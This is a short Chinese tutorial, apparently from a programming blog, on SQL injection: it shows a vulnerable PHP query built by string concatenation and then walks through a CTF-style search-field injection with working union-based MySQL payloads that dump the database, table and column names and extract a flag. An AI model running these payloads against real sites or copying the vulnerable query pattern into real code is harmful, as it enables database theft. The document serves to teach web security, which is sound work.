SQL注入
2021/7/7 2:06:07
本文主要是介绍SQL注入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
预备知识:
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。
常见的SQL注入漏洞关键代码如下:
$sql = "SELECT * FROM news WHERE id="; $sql . = $_GET['id']; $result = mysql_query($sql);
首页
搜索结果
加单引号报500错误
可以看到报了sql语句错误
看到了 % ,搜索型注入?
还可以看到用的是mysql数据库,下面好说了直接爆?
1、order by语句测试表中有几列
搜索%' order by 1 #
显示正常
order by 2的时候报错,
所以表中只有一列
2、union select 测试显示位
搜%' union select 1 #
正常回显
3、union联合查询爆数据库名
搜索%' union select database() #
4、爆表名
搜索%' union select group_concat(table_name) from information_schema.tables where table_schema='attackdb' #
5、爆db_news表的列名
0%' union select group_concat(column_name) from information_schema.columns where table_name='db_news' and table_schema='attackdb' #
看到了flag。。
6、爆flag
0%' union select flag from attackdb.db_news #
这篇关于SQL注入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-09-28AI给的和自己写的Python代码,都无法改变输入框的内容,替换也不行
- 2024-09-27Sentinel配置限流资料:新手入门教程
- 2024-09-27Sentinel配置限流资料详解
- 2024-09-27Sentinel限流资料:新手入门教程
- 2024-09-26Sentinel限流资料入门详解
- 2024-09-26Springboot框架资料:初学者入门教程
- 2024-09-26Springboot框架资料详解:新手入门教程
- 2024-09-26Springboot企业级开发资料:新手入门指南
- 2024-09-26SpringBoot企业级开发资料新手指南
- 2024-09-26Springboot微服务资料入门教程